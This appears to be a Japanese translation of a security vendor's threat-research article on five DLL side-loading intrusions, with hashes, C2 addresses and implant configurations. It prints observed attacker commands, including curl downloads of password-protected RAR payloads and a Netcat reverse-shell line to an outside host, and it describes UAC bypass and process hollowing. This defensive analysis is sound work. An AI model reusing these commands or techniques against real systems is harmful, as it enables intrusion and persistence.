<pre>1  C:\Windows\SysWOW64\rundll32.exe [5624]
rundll32.exe  SSCE5532.dll RunMain
2  C:\Windows\System32\rundll32.exe [7864]
rundll32.exe  SSCE5532.dll RunMain
3  C:\Windows\System32\cmd.exe [3288]
4  C:\Windows\explorer.exe [4628]</pre>
<p>攻撃者は、悪意のある DLL をデスクトップに配置しました。その後、標準的な Metasploit (あるいは Cobalt Strike) のリバース HTTP シェルのシェルコードを実行し、攻撃者が管理する以下のサーバーに接続しました。</p>
<pre>91.245.253.52:6060/rKVI</pre>
<h3>事例 2: 二重の攻撃</h3>
<p>この事例は、最初の事例の確認後、91.245.253[.]52 サーバーが使用される他の事例を探したところ、発見されたものです。この事例は 2 件の DLL サイドローディング攻撃に関連するものです。</p>
<h4>2.1: 最初のサイドローディング攻撃</h4>
<p>最初の感染は、デジタル署名された正規の Cisco アプリケーションである ciscocollabhost.exe を用いて行われ、実行時に悪意のある DLL である ciscoparklauncher.dll がロードされました。</p>
<p>ソフォスのテレメトリの観測結果から、ローダーは ciscosparklauncher.dll であり、ペイロードは同じディレクトリ内の 2831329086.inf だと考えられています。</p>
<p>次に、以下のコマンドラインで示されるように、パスワードで保護された RAR アーカイブを配布サーバーからダウンロードし、展開します。</p>
<pre>http://5.252.178.162/IJOINOIS/c.rar -o 
C:\\users\\public\\libraries\\c.rar",
    "commandLine" : "c:\\windows\\system32\\cmd.exe /C 
c:\\progra~1\\winrar\\rar.exe x -hpNONI*(uy23oninjfoisjnsofnsc 
C:\\users\\public\\libraries\\c.rar  C:\\Users\\Public\\libraries"</pre>
<p>RAR アーカイブには、以下のファイルが含まれています。</p>
<pre>86f7661039a0855be8d6d1cb55391f398932e80c  googleupdate.exe (clean VLC EXE)
ed67a11646c1b28bc856941743331acb47f1b7b4  goopdate.ja (encrypted implant)
e5be6f621c4a10372837baf795a37b1caa942d23  libvlc.dll (malicious loader)
b2eb8516ab136aa44106c13cc859dcee77d1bc1f  loader.ja (encrypted implant)
d90355d2a53b662c1d3fe7ab4430d3955a54f73f  time.sig (encrypted config)</pre>
<h4>2.2: 2 度目のサイドローディング攻撃</h4>
<p>次に、c.rar 内の実行ファイル googleupdate.exe (このファイルは実際には Google とは無関係な、デジタル署名された正規の VLC Media Player アプリケーションです) を使って、アーカイブ内の暗号化されたインプラントからペイロードをロードする悪意のあるローダー、libvlc.dll をサイドロードします。</p>
<p>便利なことに、これらのインプラントは、進行状況について詳細なデバッグログを書き出します。</p>
<p>p1-p11: 権限昇格の進行状況メッセージ<br />
x1-x4: モジュール実行の進行状況メッセージ</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image1.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87827" src="https://news.sophos.com/wp-content/uploads/2022/11/image1.png" alt="A debugger screenshot showing events being logged" width="640" height="648" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image1.png 654w, https://news.sophos.com/wp-content/uploads/2022/11/image1.png?resize=296,300 296w, https://news.sophos.com/wp-content/uploads/2022/11/image1.png?resize=32,32 32w, https://news.sophos.com/wp-content/uploads/2022/11/image1.png?resize=50,50 50w, https://news.sophos.com/wp-content/uploads/2022/11/image1.png?resize=64,64 64w, https://news.sophos.com/wp-content/uploads/2022/11/image1.png?resize=96,96 96w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 1: 記録されるイベントログ</em></p>
<p>2 度目のサイドローディング攻撃が完了すると、マルウェアは今度は 443 番ポートでステージャーサーバーに接続します。</p>
<h3>事例 3: より複雑な攻撃</h3>
<p>この攻撃は、ソフォスの動的シェルコード対策 HeapHeapProtect によって検出されました。HeapHeapProtect は、ヒープ領域で実行されるコードが元のアプリケーションのメモリ領域に任意のコードを追加することを防止します。さらに、他のアプリケーションへの水平方向のコード注入も防止し、不審な動きが確認された場合にはフラグを立てます。この事例でも、以前の事例と同様、2 度のサイドローディングが試みられました。この事例の最初のサイドローディング攻撃は、上述の 2 つの事例で確認されたものとまったく同じでした。</p>
<h4>3.1: 最初のサイドローディング攻撃</h4>
<p>最初の攻撃では、他の事例で確認されたのと同一の実行ファイルおよび悪意のある DLL が用いられ、再度 91.245.253[.]52 に接続するのが確認されました。その後、パスワードで保護された RAR ファイルが別の配布サーバーからダウンロードされ、展開されました。</p>
<pre>         "commandLine" : "curl  -k 
http://103.253.72.116/akjsdnfkjsnjfekse/walk.rar -o 
C:\\users\\public\\libraries\\walk.rar",
         "commandLine" : "C:\\Progra~1\\WinRAR\\Rar.exe  x -
hplic\\down443 C:\\users\\public\\libraries\\walk.rar 
C:\\Users\\Public\\Downloads\\",</pre>
<p>walk.rar アーカイブには 6 件のファイルが含まれています。暗号化されたインプラント 3 件、暗号化された構成ファイル (すべて拡張子は PLG です)、正規の実行ファイル (Razer Chromium レンダリングプロセス Netsky.exe)、および悪意のある DLL (RzLog4CPP_Logger.dll) です。</p>
<h4>3.2: 2 度目のサイドローディング攻撃</h4>
<p>2 度目のサイドローディング攻撃には、Netsky.exe ローダーと、最初の攻撃と同一の、悪意のある RzLog4CPP_Logger.dll が用いられていました。まず、暗号化されたインプラントの 1 つである alloc.plg が復号化されて読み込まれます。さらに、このインプラントが他のファイルをロードします。</p>
<p>また、攻撃者が NetSky.exe のパスを引数として 2.exe を実行していることも確認されました。この実行ファイルの機能は、現在のところ不明です。</p>
<h3>事例 4: 「ワーム祭り」</h3>
<p>この事例は、上述の事例で発見されたサイドローディング DLL の特徴を参照して <a href="https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt">VirusTotal RetroHunt</a> を実行したことで発見されました。この事例は、本記事で紹介する 5 つの事例の中で、最も複雑です。後ほど、5 つの事例の感染時系列をより深く分析する際に、この事例を再度見ていきます。この事例では、サイドローディングが 3 度試みられました。</p>
<p>この事例と上述の他のサイドローディング攻撃事例とのコードの重複が (特にローダーのシェルコードで) 顕著であることから、この事例も同じ攻撃者によるものだと考えられます。しかし、ペイロードの中身はまったく別物でした。 この事例では USB ワームが用いられていたのです。このワームの目的は不明です。ワームは、USB ドライブの root からすべてのファイルを収集し、感染が他のデバイスに広がる際に収集したファイルをコピーします。意図的なデータ窃取である可能性もあれば、マルウェアの拡散過程における単なる意図しない副次的効果である可能性もあります。</p>
<p>この事例では、攻撃者は正規の実行ファイル usbconfig.exe (disk_watch.exe、usb drive.exe、Removable Disk.exe とも)、暗号化されたインプラント (usb.ini)、悪意のあるインプラントローダー (u2ec.dll) を使用しました。</p>
<h4>4.1: USB ワームの結合</h4>
<p>この事例では、<a href="https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html">Mustang Panda</a> と <a href="https://securelist.com/apt-luminousmoth/103332/">LuminousMoth</a> という他の 2 つの APT グループ由来のコンポーネントが、攻撃者が配信したファイルと同じディレクトリにサイドロードされているのが確認されました。この 2 種類の APT グループの存在は、複合的な攻撃の兆候というよりは、むしろファイル収集の過程での巻き添えだと考えられます。</p>
<p>サイドローディング攻撃に関連するファイルとしては、disk_watch.exe と u2ec.dll が確認されました。  Mustang Panda に関連するファイルとして、rzlog4cpp.dll (Mustang Panda リバースシェル、事例 3 の RzLog4CPP_Logger.dll とは別のもの)、wuwebv.exe (名前を変更された Netcat のクリーンコピー)、Netcat の正規の関連ファイルである DLL 2 件が確認されました。</p>
<p>rzlog4cpp.dll は、以下のコマンドラインで Netcat コンポーネントを呼び出すことで、リバースシェルを確立します。</p>
<pre>cmd.exe /C wuwebv.exe -t -e c:\windows\system32\cmd.exe 
closed.theworkpc.com 80</pre>
<p>LuminousMoth に対応するファイルとして、正規の Silverlight ランチャーである msbuild.exe と、悪意のある DLL である version.dll が確認されました。最後のファイルは USB ワームでもあり、前述の事例 4 の usb.ini インプラントと同様の機能を持ちます。これらの活動は、<a href="https://www.kaspersky.com/about/press-releases/2021_rare-mass-advanced-threat-campaign-targets-more-than-a-thousand-users-in-southeast-asia">2021 年に確認</a>された LuminousMoth APT の活動と類似しています。</p>
<p>さらにもう 1 つ、Microsoft の WinWord.exe の正規コピーであるコンポーネントも確認されました。このコンポーネントの役割は不明ですが、Kaspersky 社の研究者は、悪意のある DLL である wwlib.dll をサイドロードするために使用された可能性があると指摘しています。</p>
<h3>事例 5: 三重の脅威</h3>
<p>この事例では、事例 4 と同様に、3 種類のサイドローディング攻撃を検証します。一方、この事例ではワームは検出されませんでした。最初の 2 度の攻撃については事例 3 で扱いましたが、僅かな違いも確認されました。また、この「三重の脅威」は、事例 2 とも関係しています。</p>
<h4>5.1: 最初のサイドローディング攻撃</h4>
<p>事例 2 と同様に、攻撃者は ciscocollabhost.exe と ciscosparklauncher.dll を使用し、5.252.178[.]162/IJOINOIS から c.rar をダウンロード、展開、実行しました。</p>
<p>しかし今回、攻撃者はさらにパスワードで保護された RAR アーカイブである v1.rar を 103.253.72.[.]116/_akjsdnfkjsnjfekse からダウンロードし、実行しました。(この IP アドレスは事例 3 で用いられたものと同一です。) v1.rar には、smstore.exe と msvcrt.dll (いずれも正規の Microsoft ファイル) 、悪意のある DLL である SYSMSRV.dll が含まれています。</p>
<h4>5.2: 2 度目のサイドローディング攻撃</h4>
<p>この攻撃では事例 2 と同様、googleupdate.exe (VLC の正規の実行ファイル) と、悪意のある DLL である libvlc.dll が使用されました。</p>
<pre>c:\users\public\libraries\out\googleupdate.exe :  
6f924de3f160984740fbac66cf9546125330fc00f4f5d2dbf05601d9d930b7d9
c:\users\public\libraries\out\libvlc.dll : 
2fd75763307c5aec5603adc6d02a7c5f34d605a0989e856001b4ae2eef2b4327</pre>
<h4>5.3: 3 度目のサイドローディング攻撃</h4>
<p>この攻撃でも v1.rar 由来の、同一のファイルが使用されています。一方、攻撃者は UAC をバイパスして正体不明のファイルである 3.exe を含むコマンドを実行する手法も使用しています。(この UAC バイパス手法については後述します。)事例 3 の「2.exe」と同様、この実行ファイルの目的は不明です。</p>
<h2>共通点: ローダーシェルコード</h2>
<p>上述の 5 つの事例について、共通点を確認してみましょう。</p>
<p>まず、事例 1 で紹介した、最初の手がかりとなった悪意のあるサーバー 91.245.253[.]52 は、すべての事例で出現していました。その他、興味深い痕跡を以下の表に示します。</p>
<table style="border-collapse: collapse;width: 608pt" width="810">
<tbody>
<tr style="height: 14.25pt">
<td class="xl18" style="width: 169pt;height: 14.25pt;text-align: center" width="225" height="19"></td>
<td class="xl18" style="width: 88pt;text-align: center" width="117"><strong>事例 1</strong></td>
<td class="xl18" style="width: 88pt;text-align: center" width="117"><strong>事例 2</strong></td>
<td class="xl18" style="width: 88pt;text-align: center" width="117"><strong>事例 3</strong></td>
<td class="xl18" style="width: 88pt;text-align: center" width="117"><strong>事例 4</strong></td>
<td class="xl18" style="width: 88pt;text-align: center" width="117"><strong>事例 5</strong></td>
</tr>
<tr style="height: 43.5pt">
<td class="xl16" style="width: 169pt;height: 43.5pt;text-align: center" width="225" height="58"><strong>サイドローダーの数</strong></td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">0<span class="font5"> </span></td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">2</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">2</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">1 + 無関係な攻撃の断片</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">3</td>
</tr>
<tr style="height: 14.25pt">
<td class="xl19" style="width: 169pt;height: 14.25pt;text-align: center" width="225" height="19"><strong>91.245.253[.]52 への接続</strong></td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">あり</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">あり</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">あり</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">あり</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">あり</td>
</tr>
<tr style="height: 14.25pt">
<td class="xl16" style="width: 169pt;height: 14.25pt;text-align: center" width="225" height="19"><strong>5.252.72[.]116 への接続</strong></td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">あり</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">あり</td>
</tr>
<tr style="height: 14.25pt">
<td class="xl19" style="width: 169pt;height: 14.25pt;text-align: center" width="225" height="19"><strong>103.253.72[.]116 への接続</strong></td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">あり</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">あり</td>
</tr>
<tr style="height: 14.25pt">
<td class="xl16" style="width: 169pt;height: 14.25pt;text-align: center" width="225" height="19"><strong>UAC バイパス</strong></td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">あり</td>
</tr>
<tr style="height: 115.5pt">
<td class="xl19" style="width: 169pt;height: 115.5pt;text-align: center" width="225" height="154"><strong>悪用される正規アプリケーション</strong></td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">Cisco Webex、VLC Media Player</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">Cisco Webex Razer Chromium レンダリングプロセス</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">Netcat、SilverLight (LuminousMoth 経由)、WinWord (目的不明)、Cisco、VLC Media Player</td>
<td class="xl19" style="width: 88pt;text-align: center" width="117">Cisco Webex、Microsoft Symbol Server Builder、VLC Media Player</td>
</tr>
<tr style="height: 14.25pt">
<td class="xl16" style="width: 169pt;height: 14.25pt;text-align: center" width="225" height="19"><strong>USB ワーム</strong></td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">あり</td>
<td class="xl16" style="width: 88pt;text-align: center" width="117">なし</td>
</tr>
</tbody>
</table>
<p><em>表 1: 5 件の DLL サイドローディング攻撃の特徴と痕跡</em></p>
<p>さらに注目すべきなのは、サイドローダー DLL がプラグインを復号化する際に、ファイルの先頭バイトにジャンプして実行を追跡していることです。復号化されたプラグインは、暗号化されたプラグイン DLL をロードする、短い PE ローダーシェルコードなどを含んでいます。このローダーシェルコードは、以下の 7 つのシナリオすべてに共通であり、各シナリオに強い関連性があることがわかります。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image2.png"><img decoding="async" loading="lazy" class="alignnone wp-image-87828 size-full" src="https://news.sophos.com/wp-content/uploads/2022/11/image2.png" alt="Screenshot of a disassembly showing the loader shellcode" width="524" height="734" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image2.png 524w, https://news.sophos.com/wp-content/uploads/2022/11/image2.png?resize=214,300 214w" sizes="(max-width: 524px) 100vw, 524px" /></a></p>
<p><em>図 2: 共通のローダーシェルコード</em></p>
<p><a href="https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf">PlugX ローダー</a>と同様に、このシェルコードローダーは、復号化されロードされたプラグイン DLL の最初の 0x1000 バイトを 0 バイトで上書きします。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image3.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87829" src="https://news.sophos.com/wp-content/uploads/2022/11/image3.png" alt="Screenshot of a disassembly showing a loop" width="640" height="625" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image3.png 866w, https://news.sophos.com/wp-content/uploads/2022/11/image3.png?resize=300,293 300w, https://news.sophos.com/wp-content/uploads/2022/11/image3.png?resize=768,750 768w, https://news.sophos.com/wp-content/uploads/2022/11/image3.png?resize=32,32 32w, https://news.sophos.com/wp-content/uploads/2022/11/image3.png?resize=50,50 50w, https://news.sophos.com/wp-content/uploads/2022/11/image3.png?resize=64,64 64w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 3: 最初の 0x1000 バイトを 0 バイトで上書きするループ</em></p>
<h2>詳細な分析: 5 つの事例、7 つのシナリオ</h2>
<p>続いて、分析中に発見した興味深い活動を紹介します。ここでは、上述の 5 件の事例から攻撃シナリオを 1 件ずつ取り上げ、さらに、これらの事例に関連すると思われる以前のシナリオを 2 件取り上げます。通常、1 つの事例は 1 つのシナリオ (クリーンローダー、悪意のあるローダー、プラグイン) で攻撃を行いますが、これらの事例のうち 2 つでは文字通り 2 倍のシナリオが確認されています。(なぜそうなっているのかはご想像にお任せします。)参照しやすいように、それぞれのシナリオを A、B、C、D、E と呼ぶことにします。</p>
<p>さらに、5 つの事例から得た情報をもとに、自分たちで得たデータだけでなく、他の防御者がすでに発見しており、より大きな脅威の一部としてまだフラグが立っていないものを調べることで、2 つの「追加」シナリオ (F と G) を発見しました。ここでは、このような攻撃が脅威ハンターの目にどのように映るか、およびどの程度長期にわたる脅威であるかを示すために、これらの攻撃を紹介しています。</p>
<p>さらに興味深いことに、これらの事例では、類似または同一の設定データが複数のプラグインに保存されていました。具体的なプラグインの詳細な分析の項目で改めてご紹介します。</p>
<h3>事例 1 よりシナリオ A、初期ローダー</h3>
<p>このシナリオは初期の攻撃シナリオであり、以下のような構成になっていました。</p>
<pre>c:\users\public\libraries\ciscocollabhost.exe : 
7b301cea1feff0add8de512a93ed7bc1b8330caf0c3a6f1585f9887b88db8efb 
(clean loader)
c:\users\public\libraries\ciscosparklauncher.dll : 
a73053f5410de74c8689d5a0da0df72adaa28055562626003d1b446c754d79e6 
(sideloader DLL)
c:\users\public\libraries\2831329086.inf (payload)</pre>
<h4>インプラント</h4>
<p>インプラントは 2831329086.inf という名前であり、サイドローダー DLL と同じディレクトリに配置されていました。インプラントそのものは所持していないため、活動ログから動作を推測することしかできません。</p>
<h3>事例 2 より: シナリオ B、「クールクライアント」</h3>
<p>このシナリオに属するファイルは、事例 2 で登場した c.rar から発見されたものです。</p>
<p>この攻撃シナリオは、コンポーネントに残された開発情報を見るに、「クールクライアント」と呼ばれているようです。</p>
<h4>サイドローダー DLL</h4>
<h4>libvlc.dll</h4>
<p>コンパイル日時: 2021 年 5 月 10 日 19:40:05</p>
<p>PDB パス: G:\project\木马\<strong>Cool\Client</strong>\hijack_export\libvlc\Release\libvlc.pdb</p>
<p>PDB ファイル名: G:\project\木马\Cool\Client\hijack_export\libvlc\Release\<strong>libvlc.pdb</strong><br />
(木马: <em>中国語で「トロイの木馬」</em>)</p>
<p>メイン関数であるlibvic_new を除き、libvic のエクスポートのほとんどは、すぐに終了するダミー (RET) 関数です。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image4.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87830" src="https://news.sophos.com/wp-content/uploads/2022/11/image4.png" alt="Screenshot of a disassembly showing the libvlc_new function" width="640" height="509" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image4.png 988w, https://news.sophos.com/wp-content/uploads/2022/11/image4.png?resize=300,239 300w, https://news.sophos.com/wp-content/uploads/2022/11/image4.png?resize=768,611 768w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 4: 複数の機能を保つ libvic_new</em></p>
<p>この DLL の構成情報はデフォルトのままです。構成データはメモリ領域に格納されます。まず、この DLL ファイルはハードコードされた構成情報を使用して初期化され、次に復号化した time.sig で領域が上書きされます。最初の値は構成情報の ID 文字列、2 番目は暗号化キー、3 番目は C2 アドレスのようです。</p>
<pre>cfg_find_tag
e4adbd50cf4e608d7cd3cf16022831ab
192.168.211.1</pre>
<p>RFC1918 で指定された IP アドレスから分かる通り、これらの値はデフォルト値です。実際の値で更新するために、プロセスは time.sig をロードし、そこから構成情報を解読して、標的システムの実際の設定でデフォルトの設定を上書きします。このプロセスでは以下のことが行われます。</p>
<ul>
<li>メモリ内のデフォルト値を新しい値に置き換える</li>
<li>インプラントファイル c:\programdata\GoogleUpdate\UpdateTime.ja をロードする</li>
<li>gupdaten という名前のサービスとして自身をインストールする</li>
<li>c:\windows\system32\clb.dll を検索する。このファイルが見つからなかった場合、プロセスは終了する</li>
<li>c:\programdata\GoogleUpdate\loader.ja が存在する場合、loader.ja を復号化して実行する</li>
<li>loader.ja を winver.exe プロセスに挿入する (プロセスハロウイングと呼ばれる手法。この手法についてはシナリオ 3 で詳しく説明します。)</li>
<li>libvic.dll はデフォルトの構成情報に加え、内部 IP アドレス 192.168.211.13 も含まれている。その目的は現時点では不明</li>
</ul>
<h4>インプラント</h4>
<p>これらは、感染プロセス中にロードされ実行される、暗号化されたモジュールです。</p>
<h4>Loader.ja</h4>
<p>コンパイル日時: 2021 年 5 月 31日 01:23:24</p>
<p>libvic.dll と同様にデフォルトの構成情報を含んでおり、time.sig で上書きされるようです。</p>
<p>以下は、埋め込まれた構成情報の関連する部分です。</p>
<pre>cfg_find_tag
mark
group
192.168.211.1
e4adbd50cf4e608d7cd3cf16022831ab</pre>
<p>もう 1 つの内部 IP アドレスである 192.168.211.13 は、別の場所に保存されています。</p>
<p>このインプラントは、<a href="https://gist.github.com/api0cradle/d4aaef39db0d845627d819b2b6b30512">CMSTPLUA.COM インターフェイスを使用した UAC バイパス手法</a>を採用しており、作成されたプロセスを winver.exe に挿入します。プロセスは以下のファイルとして作成されます。</p>
<pre>c:\programdata\GoogleUpdate\goopdate.ja
c:\programdata\GoogleUpdate\session.ja</pre>
<p>プロセスの流れは、以下の通りです。</p>
<ol>
<li>avp.exe プロセスを停止する (avp.exe は Kaspersky のアンチウイルスソリューションのコアコンポーネントです。プロセスの停止は検出回避の試みです。)</li>
<li>次のようなレジストリの自動実行キーを作成する: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\goopdate</li>
<li>gupdaten というサービスを追加する</li>
</ol>
<h4>goopdate.ja</h4>
<p>コンパイル日時: 2021 年 6 月 3 日 01:28:52</p>
<p>PDB パス:</p>
<p>PDB ファイル名: G:\project\木马\Cool\Client\main\Release\main.pdb<br />
(木马: <em>中国語で「トロイの木馬」</em>)</p>
<p>このファイルは、コードの中で、以下のような複数のソースファイルを参照しています。</p>
<pre>g:\project\..\cool\client\main\main\ckernelmanager.cpp
g:\project\..\cool\client\main\main\cmyudpclient.cpp
g:\project\..\cool\client\main\main\cmytcpclient.cpp</pre>
<p>これまでの例と同様、このインプラントにはデフォルトの構成情報が含まれています。</p>
<pre>cfg_find_tag
mark
group
e4adbd50cf4e608d7cd3cf16022831ab
192.168.211.153</pre>
<p>また、同様に内部 IP アドレス 192.168.211.13 も含まれています。</p>
<p>このプラグインは正規ローダーの実行ファイルを、サービスとして自動起動するように登録します。(上述の通り、このサービスは Google Update を自称していますが、実際には VLC メディアプレーヤーの実行ファイルです。)</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image5.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87831" src="https://news.sophos.com/wp-content/uploads/2022/11/image5.png" alt="Screenshot of the Windows registry editor, showing the gupdaten service created as a key" width="640" height="172" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image5.png 1228w, https://news.sophos.com/wp-content/uploads/2022/11/image5.png?resize=300,81 300w, https://news.sophos.com/wp-content/uploads/2022/11/image5.png?resize=768,206 768w, https://news.sophos.com/wp-content/uploads/2022/11/image5.png?resize=1024,275 1024w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 5: 新規「サービス」として追加される gupdaten</em></p>
<h4>session.ja と UpdateTime.ja</h4>
<p>これらのインプラントの実物は入手できていません。わかっているのは、loader.ja がこれらのインプラントを参照し、存在する場合に読み込むということだけです。</p>
<h4>time.sig</h4>
<p>このファイルには、図 6 に示すように、暗号化された構成情報が含まれています。</p>
<pre class="Codesample">cfg_find_tag
None
machinetimeer
www.machinetimeer.com
www.machinetimeer.com
192,168,211,153
192.168.211.13
tests5
123456</pre>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image6.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87832" src="https://news.sophos.com/wp-content/uploads/2022/11/image6.png" alt="Hex dump of the config file, showing machinetimeer and machinetimeer.com" width="640" height="318" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image6.png 682w, https://news.sophos.com/wp-content/uploads/2022/11/image6.png?resize=300,149 300w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 6: machinetimeer に関連する 16 進数コード</em></p>
<h3>事例 3 より: シナリオ C、VTCP ギャンビット</h3>
<p>コード分析によると、このシナリオは、Trochilus RAT マルウェア由来の vtcp.dll を中心に構築されています。(ソースコードがただプラグインと関連しているということではありません。この dll が実際に、そっくりそのままメインインプラントに埋め込まれています。)これらのファイルはダウンロードされた walk.rar アーカイブ内に確認されました。</p>
<h4>サイドローダー DLL</h4>
<h4>RzLog4CPP_Logger.dll</h4>
<p>コンパイル日時: 2021 年 8 月 19 日 21:40:13</p>
<p>この DLL には、Google LLC のデジタル署名らしきものが含まれています (実際には偽装された自己署名です)。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image7.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87833" src="https://news.sophos.com/wp-content/uploads/2022/11/image7.png" alt="Screenshot of digital signature details" width="640" height="705" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image7.png 750w, https://news.sophos.com/wp-content/uploads/2022/11/image7.png?resize=272,300 272w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 7: 偽装されたデジタル署名</em></p>
<p>フィンガープリント:    747EC25FDC3710E46D69135FAE8797718B967E25<br />
アルゴリズム:        sha256RSA<br />
発効日時:       5:52 AM 5/10/2021<br />
失効日時:             5:52 AM 5/10/2023</p>
<p>RzLog4CPP_Logger.dll は、libvlc.dll と同じコードフロー難読化を使用しています。この dll は alloc.plg を読み込み、復号化します。</p>
<h4>インプラント</h4>
<h4>alloc.plg</h4>
<p>コンパイル日時: 2021 年 8 月 19 日 22:38:47</p>
<p>中国語の PDB 文字列を持つ、暗号化された埋め込み PE が含まれています。</p>
<p>コンパイル日時: 2018 年 2 月 10 日 19:04:13<br />
PDB ファイル名: G:\ROOT\代码工程\木马\技巧收集\38dll\Release\38dll.pdb</p>
<p>(訳: G:\ROOT\コードプロジェクト\トロイの木馬\ツール集\38dll\Release\38dll.pdb)</p>
<p>このインプラントは wusa.exe を実行します。(さらに、おそらくはプロセストークンを取得します。)</p>
<p>Microsoft の仕様通り、新しいプロセスとプライマリスレッドが作成されます。作成されたプロセスは、指定された実行可能ファイルを指定された資格情報 (ユーザー、ドメイン、パスワード) のセキュリティ権限で実行します。指定されたユーザーのユーザープロファイルを読み込むこともあります。この手法の悪用は、<a href="https://twitter.com/vk_intel/status/991226679380074496">2018 年に研究者の Vitali Kremez 氏によって指摘</a>されており、<a href="https://blog.talosintelligence.com/2016/09/tofsee-spam.html">Tofsee</a> プラグインベースのスパムボットに関連するものです。<a href="https://gist.github.com/dezhub/c0fee68d1e06657a45ec39365362fca7">類似の手法</a>として、ファイルレスの AlwaysNotify UAC バイパス手法である Vault7  が挙げられます。</p>
<p><a href="https://news.sophos.com/wp-content/uploads/2022/11/image8.png"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-87834" src="https://news.sophos.com/wp-content/uploads/2022/11/image8.png" alt="A disassembly of a UAC bypass function" width="640" height="119" srcset="https://news.sophos.com/wp-content/uploads/2022/11/image8.png 1476w, https://news.sophos.com/wp-content/uploads/2022/11/image8.png?resize=300,56 300w, https://news.sophos.com/wp-content/uploads/2022/11/image8.png?resize=768,143 768w, https://news.sophos.com/wp-content/uploads/2022/11/image8.png?resize=1024,190 1024w" sizes="(max-width: 640px) 100vw, 640px" /></a></p>
<p><em>図 8: UAC バイパス</em></p>
<p>ユーザー名: uac<br />
ドメイン: is<br />
パスワード: useless</p>
<p>この UAC バイパスにより、free.plg が dllhost.exe 内に隠蔽されます。(シナリオ 2 でも用いられている「<a href="https://attack.mitre.org/techniques/T1055/012/">ハロウイング</a>」とは、攻撃者が実行ファイル (この場合は dllhost) のコードを削除し、悪意のあるコードを埋め込むことで、「信頼された」実行ファイルを標的マシンに実行させる攻撃を指します。)実行時に正規ローダーに渡される、実行可能なコマンドラインパラメータは以下の通りです。</p>
<p>passuac<br />
online<br />
install</p>
<p>allog.plg は <a href="https://gist.github.com/api0cradle/d4aaef39db0d845627d819b2b6b30512">UAC_Bypass_CMSTPLUA</a> を使用し、「C:\ProgramData\Netsky\NetSky.exe online」というコマンドでサービス (InstallSvc) を作成します。</p>
<h4>free.plg</h4>
<p>コンパイル日時: 2021 年 8 月 19 日 21:21:29</p>
<p>free.plg は現在のサービスを停止し、Global\\ACT というイベントを作成し、パラメータ 0 で sas.dll の sendSAS 関数を呼び出します。次に、C:\\ProgramData\\Netsky から local.plg と main.plg を (サービスが見つかった場合に) 読み込みます。main.plg は dllhost.exe プロセス内に隠蔽されます。</p>
<p>フラグファイルらしき C:\\ProgramData\\Netsky\\vs_session.dat というファイルが開かれます。(検証のための復元はできていません。)ファイルが存在しない場合、プロセスはループして検索を続けます。</p>
<h4>local.plg</h4>
<p>local.plg には、インプラントとは異なる暗号化方式で暗号化された構成情報が格納されています。デコードされたデータには、以下のような文字列が含まれます。</p>
<pre>cfg_find_tag
test
188.127.237.27
188.127.237.27
674e8fb2f2c8d8699200d56493722c90</pre>
